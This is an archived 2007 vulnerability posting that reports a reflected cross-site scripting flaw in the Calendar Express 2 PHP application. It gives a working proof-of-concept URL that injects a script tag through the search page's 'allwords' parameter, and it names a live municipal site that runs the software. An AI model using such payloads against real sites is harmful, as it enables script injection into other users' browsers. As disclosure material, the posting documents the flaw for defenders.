Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16087
HistoryFeb 15, 2007 - 12:00 a.m.

XSS in [Calendar Express 2 ]

2007-02-1500:00:00
vulners.com
19

hey guys … check out this new xss i just found ;P

Vulnerable : Calendar Express 2
web : http://www.ci.emeryville.ca.us/calendar, http://www.phplite.com/products/calendarexpress/

XSS :

http://127.0.0.1/calendar/search.php?allwords=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E&cid=1&title=1&desc=1

################################
Discovered By BLacK ZeRo
K.S.A
[email protected]
################################

Best regards ,